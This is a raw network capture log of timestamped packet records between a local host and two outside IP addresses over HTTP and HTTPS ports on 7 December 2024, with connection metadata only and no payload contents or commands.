Dec 7, 2024 12:59:16.916127920 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.917212009 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.917226076 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.917243004 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.917258978 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.917279005 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.918402910 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.918416023 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.918457985 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.920795918 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.920809984 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.920819998 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.920867920 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.921947956 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.923125982 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.923186064 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.924251080 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.924263954 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.924308062 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.924345970 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.925487041 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.925499916 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.925510883 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.925550938 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.926594973 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.926606894 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.926668882 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.928966045 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.928980112 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.929029942 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.930224895 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.930241108 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.930291891 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.931468964 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.931493044 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.931505919 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.931549072 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.931565046 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.932477951 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.932528973 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.933692932 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.933739901 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.933775902 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.933830976 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.933834076 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.933870077 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.933887005 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.934988022 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.935025930 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.935051918 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.935055017 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.935080051 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.936223984 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.936297894 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.936352968 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.938508034 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.938529015 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.938587904 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.941926956 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.942090034 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.942111969 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.942131042 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.944410086 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.944426060 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.944473982 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.945111036 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.945127010 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.945137024 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.945162058 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.945178032 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.946034908 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.946049929 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.946091890 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.946851015 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.946865082 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.946911097 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.947779894 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.947794914 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.947848082 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.948477030 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.948498964 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.948532104 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.948545933 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.949664116 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.949677944 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.949688911 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.949723959 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.950608969 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.950643063 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.950687885 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.951936007 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.951956034 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.952006102 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.953680038 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.953701973 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.953748941 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.955045938 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.955060005 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.955070019 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.955118895 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.955132008 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.956010103 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.956023932 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.956065893 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.957031965 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.957046032 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.957093954 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.958183050 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.958197117 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.958236933 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.959192038 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.959240913 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.960083961 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.960099936 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.960136890 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.961018085 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.962013006 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.962066889 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.962847948 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.962862015 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.962908030 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.963495970 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.963509083 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.963521004 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.963552952 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.963567019 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.964260101 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.964281082 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.964306116 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.964323044 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.966209888 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.966224909 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.966269970 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.967031956 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.967050076 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.967092991 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.967955112 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.967968941 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.968010902 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.968925953 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.968940020 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.968987942 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.970118999 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.970141888 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.970189095 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.971476078 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.972420931 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.972446918 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.972476959 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.972490072 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.975888014 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.975917101 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.975970030 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.976005077 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.976022005 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.976047039 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.981648922 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.981661081 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.981828928 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.982410908 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.982424021 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.982482910 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.983441114 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.983453989 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.983505964 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.985671997 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.985687017 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.985985041 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.986843109 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.986860991 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.986871958 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.986923933 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.988154888 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.988168955 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.988215923 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.988240957 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.989212036 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.989265919 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.989315987 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.989337921 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.989394903 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.989423037 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:16.989437103 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.990528107 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.990595102 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:16.990598917 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.991664886 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.991683006 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.991730928 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.992773056 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.992786884 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.992796898 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.992830038 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.992861986 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:16.994122028 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.994136095 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:16.994178057 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.011801004 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:17.011822939 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:17.011909962 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:17.011935949 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:17.011984110 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:17.015928984 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:17.015993118 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:17.016048908 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:17.016824961 CET	49702	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:17.016844988 CET	443	49702	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:17.041167974 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.041414976 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.041500092 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.041954041 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.042474031 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.042520046 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.042998075 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.043045044 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.043536901 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.044071913 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.044116020 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.044605017 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.045145988 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.045188904 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.045658112 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.045697927 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.046272993 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.046756029 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.046796083 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.047281981 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.047791958 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.047836065 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.048314095 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.048367977 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.048835993 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.049422026 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.049468040 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.049899101 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.050431967 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.050487995 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.050983906 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.051026106 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.051480055 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.052050114 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.052145958 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.052556038 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.052608013 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.053064108 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.053124905 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.053623915 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.053672075 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.054141998 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.054662943 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.054716110 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.055188894 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.055563927 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.055723906 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.055845022 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.056291103 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.056345940 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.056847095 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.056900024 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.057352066 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.057395935 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.057919979 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.057972908 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.058397055 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.058439970 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.058969021 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.059010029 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.059484005 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.059668064 CET	49703	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:17.059678078 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.059729099 CET	443	49703	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:17.059804916 CET	49703	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:17.059998989 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.060045958 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.060554028 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.060599089 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.061109066 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.061137915 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.061151028 CET	49704	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:17.061187983 CET	443	49704	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:17.061399937 CET	49705	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:17.061439037 CET	443	49705	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:17.061439037 CET	49704	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:17.061574936 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.061614990 CET	49703	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:17.061631918 CET	443	49703	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:17.061644077 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.061645985 CET	49705	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:17.062104940 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.062154055 CET	49706	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:17.062163115 CET	443	49706	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:17.062186956 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.062218904 CET	49706	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:17.062422991 CET	49706	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:17.062434912 CET	443	49706	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:17.062640905 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.062649012 CET	49704	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:17.062658072 CET	443	49704	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:17.062683105 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.062727928 CET	49705	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:17.062743902 CET	443	49705	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:17.063239098 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.063250065 CET	49707	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:17.063258886 CET	443	49707	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:17.063281059 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.063307047 CET	49707	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:17.063456059 CET	49707	443	192.168.2.7	13.107.246.63
Dec 7, 2024 12:59:17.063467979 CET	443	49707	13.107.246.63	192.168.2.7
Dec 7, 2024 12:59:17.063730955 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.063781977 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.064260006 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.064310074 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.064779043 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.064826965 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.065267086 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.067153931 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.106313944 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.106410980 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.106559992 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.106939077 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.107052088 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.107090950 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.107305050 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.107379913 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.107867002 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.107922077 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.108376980 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.108422995 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.108879089 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.108927965 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.109416962 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.109591007 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.109952927 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.110001087 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.110467911 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.110515118 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.111011982 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.111079931 CET	49701	80	192.168.2.7	185.215.113.206
Dec 7, 2024 12:59:17.111550093 CET	80	49701	185.215.113.206	192.168.2.7
Dec 7, 2024 12:59:17.111596107 CET	49701	80	192.168.2.7	185.215.113.206
